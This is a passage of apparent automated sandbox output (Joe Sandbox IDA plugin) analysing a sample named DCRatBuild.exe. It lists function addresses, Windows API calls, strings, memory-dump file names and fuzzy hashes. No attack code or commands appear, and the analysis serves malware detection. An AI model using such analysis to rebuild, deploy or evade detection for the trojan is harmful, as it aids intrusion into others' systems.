<, xrefs: 0008CD68
MIN, xrefs: 0008CDF5
HIDE, xrefs: 0008CDC6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 642c2bbfceb1151243fde71275c69424ed873048ca7601bb2848517095690a7b
Instruction ID: f570ae14c1b963c8915e162bf38a1a0d127548fd010a4e07c68b3d247bc5a9a3
Opcode Fuzzy Hash: 642c2bbfceb1151243fde71275c69424ed873048ca7601bb2848517095690a7b
Instruction Fuzzy Hash: 4C316072900209AAEF25EB60CC41EEE73FCBB15350F004166F541E7181EBB09E848FA1

Function 0007B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0007B9B8

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

_wcschr.LIBVCRUNTIME ref: 0007B9D6
_wcschr.LIBVCRUNTIME ref: 0007B9E6

Strings

%c:\, xrefs: 0007B9AE

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 7aba6c5e960b48c9a953c95b3df00e4330124967ac199945b9b8ddee6907a5a9
Instruction ID: 0258b3d386f2d998f30d9590d0f5910faa7cffb107607039a17c49e1b4b368dc
Opcode Fuzzy Hash: 7aba6c5e960b48c9a953c95b3df00e4330124967ac199945b9b8ddee6907a5a9
Instruction Fuzzy Hash: 8B01F96390431179DA70AB798C46EABB7ECDF91770B40C51AF558D6083EB38D44082F6

Function 0008B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0008B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0008B712
DeleteObject.GDI32(00000000), ref: 0008B744
DeleteObject.GDI32(00000000), ref: 0008B767

Part of subcall function 0008A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0008B73D,00000066), ref: 0008A6D5
Part of subcall function 0008A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A6EC
Part of subcall function 0008A6C2: LoadResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A703
Part of subcall function 0008A6C2: LockResource.KERNEL32(00000000,?,?,?,0008B73D,00000066), ref: 0008A712
Part of subcall function 0008A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0008B73D,00000066), ref: 0008A72D
Part of subcall function 0008A6C2: GlobalLock.KERNEL32(00000000), ref: 0008A73E
Part of subcall function 0008A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0008A762
Part of subcall function 0008A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0008A7A7
Part of subcall function 0008A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0008A7C6
Part of subcall function 0008A6C2: GlobalFree.KERNEL32(00000000), ref: 0008A7CD

Strings

], xrefs: 0008B71A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 03f85338c1a4c4603dddc89654263b9ab40e7ce0804d00c789a409dc6ce4ee22
Instruction ID: c6db76b5477551e5fa2b97d5a9b9ffd08c9fe01d89a34df5e74d45bdb155434c
Opcode Fuzzy Hash: 03f85338c1a4c4603dddc89654263b9ab40e7ce0804d00c789a409dc6ce4ee22
Instruction Fuzzy Hash: CF01D236600601A7E71277749C19ABF7BB9BFC1B62F180012FD80A7296EF758D1947B2

Function 0008D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

EndDialog.USER32(?,00000001), ref: 0008D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0008D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0008D675
SetDlgItemTextW.USER32(?,00000068), ref: 0008D684

Strings

RENAMEDLG, xrefs: 0008D618

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: e605f39a9394fdb2d77b2e16db80f4d2ee36d62607ae16d4d28b3c27314bf8b9
Instruction ID: c52f5602a54e86c2fe08a65b235dc15063bbfaf9900a252a07d0a42d3c142fd6
Opcode Fuzzy Hash: e605f39a9394fdb2d77b2e16db80f4d2ee36d62607ae16d4d28b3c27314bf8b9
Instruction Fuzzy Hash: 590140333453197BE2206F645D09F6B7B9DFB5A701F010213F785A10D0D7A99914977A

Function 00097E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00097E24,?,?,00097DC4,?,000AC300,0000000C,00097F1B,?,00000002), ref: 00097E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00097EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00097E24,?,?,00097DC4,?,000AC300,0000000C,00097F1B,?,00000002,00000000), ref: 00097EC9

Strings

CorExitProcess, xrefs: 00097E9E
mscoree.dll, xrefs: 00097E8C

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b6b965e988ba880f8ce4fdee35d595506afe55ee4d0fc1a12b541f4627f4c4e3
Instruction ID: bf381a21e9b3e1f7d4be14df9ee8892cc98c9a1066a918989726ac55d2792362
Opcode Fuzzy Hash: b6b965e988ba880f8ce4fdee35d595506afe55ee4d0fc1a12b541f4627f4c4e3
Instruction Fuzzy Hash: 64F06232A14608BBDF119FA0DC09BEEBFB4EF49711F0441A9F809A6260DB359E40DB90

Function 0007F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0008081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00080836
Part of subcall function 0008081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0007F2D8,Crypt32.dll,00000000,0007F35C,?,?,0007F33E,?,?,?), ref: 00080858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0007F2E4
GetProcAddress.KERNEL32(000B81C8,CryptUnprotectMemory), ref: 0007F2F4

Strings

CryptUnprotectMemory, xrefs: 0007F2EA
Crypt32.dll, xrefs: 0007F2CE
CryptProtectMemory, xrefs: 0007F2DE

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 5409e35f2393ae22460836ebe17271795b1da20c59ca32ffa5186bef56d0b9e1
Instruction ID: 1d2bd7f5d21eb087ccc332df8740e62bcc0b4d99ffcf1e1369e37b56c94a4fc0
Opcode Fuzzy Hash: 5409e35f2393ae22460836ebe17271795b1da20c59ca32ffa5186bef56d0b9e1
Instruction Fuzzy Hash: 8CE02630D00B129ED7209FB4980DB01BAD46F16700F00C81DF0CAD3241DAB8D1818B00

Function 00092BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00092CA1
___AdjustPointer.LIBCMT ref: 00092CC4
_abort.LIBCMT ref: 00092D12
___AdjustPointer.LIBCMT ref: 00092D60

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: b4199e1c5bdb900235eab5da0612deb34950d2bc6bcb5f21821759eed0cd8cec
Instruction ID: f9c027081c7065cea67fa15535616824e6be31902d44af7c19d0ed22a8c12e61
Opcode Fuzzy Hash: b4199e1c5bdb900235eab5da0612deb34950d2bc6bcb5f21821759eed0cd8cec
Instruction Fuzzy Hash: 9051CEB2606212BFDF299F14D845BAA77E4FF54310F24412DE801476A2E732ED90FB90

Function 0009BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0009BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009BF5C

Part of subcall function 00098E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00094286,?,0000015D,?,?,?,?,00095762,000000FF,00000000,?,?), ref: 00098E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009BF82
_free.LIBCMT ref: 0009BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0009BFA4

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: dd31dde8f8dd156fbb17aa13babc3406e4c7b6604113560248abd7ba5f553124
Instruction ID: bb50f26f3272b57c8671806c694921d83aa6ed77cc56cbe28a5e46fee59cadb2
Opcode Fuzzy Hash: dd31dde8f8dd156fbb17aa13babc3406e4c7b6604113560248abd7ba5f553124
Instruction Fuzzy Hash: CB0184726056157F2B211AB66D5DDBB7AADDFC3BB13144139F904C2241EF648D02A5B0

Function 00099869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000991AD,0009B188,?,00099813,00000001,00000364,?,000940EF,?,?,000B1098), ref: 0009986E
_free.LIBCMT ref: 000998A3
_free.LIBCMT ref: 000998CA
SetLastError.KERNEL32(00000000,?,000B1098), ref: 000998D7
SetLastError.KERNEL32(00000000,?,000B1098), ref: 000998E0

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6ea2076cf37b4f7cb343732bd94bfb311df5c8497235e4e64b8312113d47ab0c
Instruction ID: 1cb6559045ce6b0e4aa85ed3f1d702aa8b9b600b29f21606459b7239c7e07aff
Opcode Fuzzy Hash: 6ea2076cf37b4f7cb343732bd94bfb311df5c8497235e4e64b8312113d47ab0c
Instruction Fuzzy Hash: F3012836245A016BEF26237DAC85E6F26ADDFD3771720013DF515922D3EE348C01B261

Function 00080EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000811CF: ResetEvent.KERNEL32(?), ref: 000811E1
Part of subcall function 000811CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000811F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00080F21
CloseHandle.KERNEL32(?,?), ref: 00080F3B
DeleteCriticalSection.KERNEL32(?), ref: 00080F54
CloseHandle.KERNEL32(?), ref: 00080F60
CloseHandle.KERNEL32(?), ref: 00080F6C

Part of subcall function 00080FE4: WaitForSingleObject.KERNEL32(?,000000FF,00081101,?,?,0008117F,?,?,?,?,?,00081169), ref: 00080FEA
Part of subcall function 00080FE4: GetLastError.KERNEL32(?,?,0008117F,?,?,?,?,?,00081169), ref: 00080FF6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 8a4562560b44995d4d83489e0bc511a63468020a497b281844c3ee34cae5f5c6
Instruction ID: aa4ad38ab770d40f989964cd69903390cd60734ac83448637218f93bc0707307
Opcode Fuzzy Hash: 8a4562560b44995d4d83489e0bc511a63468020a497b281844c3ee34cae5f5c6
Instruction Fuzzy Hash: DA01B172000B40EFD722AB64DC88FC6FBA9FB09710F004929F2AB92561CB757A44CB90

Function 0009C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0009C817

Part of subcall function 00098DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?), ref: 00098DE2
Part of subcall function 00098DCC: GetLastError.KERNEL32(?,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?,?), ref: 00098DF4

_free.LIBCMT ref: 0009C829
_free.LIBCMT ref: 0009C83B
_free.LIBCMT ref: 0009C84D
_free.LIBCMT ref: 0009C85F

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d1c26173b24baa854cb8b87a3728753baa148ac5cbc94065857be88d96b45994
Instruction ID: de0106d368203abd039f6ea9c7e26a6c88d77d9a8dbbc684d641251f45e6c39f
Opcode Fuzzy Hash: d1c26173b24baa854cb8b87a3728753baa148ac5cbc94065857be88d96b45994
Instruction Fuzzy Hash: 36F09632905640ABEE60DB68F9C5C5773E9AB017507544819F148D7653CF74FC80DB50

Function 00081FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00081FE5
_wcslen.LIBCMT ref: 00081FF6
_wcslen.LIBCMT ref: 00082006
_wcslen.LIBCMT ref: 00082014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0007B371,?,?,00000000,?,?,?), ref: 0008202F

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: e0850dc74c0e7aad63edf93128243cf8538fc896c51fa5ee7ddcc0aa6a2da89e
Instruction ID: 455ca200e55fa5d3636489008d3bff9fa3858ca27a5f9b75519d42db73d49083
Opcode Fuzzy Hash: e0850dc74c0e7aad63edf93128243cf8538fc896c51fa5ee7ddcc0aa6a2da89e
Instruction Fuzzy Hash: 55F01D32008114BBDF226F91EC09DCE7F26EB45760B118415F61A5A0A2CB729661EB90

Function 0008B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0008B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008B58A
IsDialogMessageW.USER32(000103F6,?), ref: 0008B59E
TranslateMessage.USER32(?), ref: 0008B5AC
DispatchMessageW.USER32(?), ref: 0008B5B6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 4507d6f5437c7f199b65dfff87170917e9d73ed79d5f5708b7be03ba2c9db4e8
Instruction ID: 307fa554ed29af1670c34d914b56229be79592aa553544b287fea114277df29b
Opcode Fuzzy Hash: 4507d6f5437c7f199b65dfff87170917e9d73ed79d5f5708b7be03ba2c9db4e8
Instruction Fuzzy Hash: 4AF0D071A0212AAB9B20ABE5EC5CEDB7FBCEF053917004415B905D2010EB38D609CBB1

Function 000815FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000817BC
_swprintf.LIBCMT ref: 0008186B

Strings

%s: %s, xrefs: 000817CB
%ls, xrefs: 00081641, 00081657

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 754901e431bbbaf7b793b78068cdd3867b090d5c584b9a9067aa27f1534606cc
Instruction ID: 49387fb72a5fb084d2cf5ced94dd4e13fdf815080c4f01fea4c27d7d3df4b168
Opcode Fuzzy Hash: 754901e431bbbaf7b793b78068cdd3867b090d5c584b9a9067aa27f1534606cc
Instruction Fuzzy Hash: C251B73564C304F6E63136908D47FF9766D7F05B04F248A46F3CB644D2D9B2A822671A

Function 00097F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 00097FAE
_free.LIBCMT ref: 00098079
_free.LIBCMT ref: 00098083

Strings

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, xrefs: 00097FA5, 00097FAC, 00097FDB, 00098013

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
API String ID: 2506810119-3540284471
Opcode ID: 9bec2e14217f1ee9d9ac8239999de5e5fd9fb024534deb9572cfe4c86805f672
Instruction ID: ad3cd5c17063d5db7f391aca69310cd6e7f727f0ba8223bb5f1a72ad3210e1ff
Opcode Fuzzy Hash: 9bec2e14217f1ee9d9ac8239999de5e5fd9fb024534deb9572cfe4c86805f672
Instruction Fuzzy Hash: 2D31A071A01208AFDF61DF99D88199EBBFCEF96310F10806AF90897311DA718A44EB61

Function 000931D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000931FB
_abort.LIBCMT ref: 00093306

Strings

MOC, xrefs: 0009320D
RCC, xrefs: 00093215

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

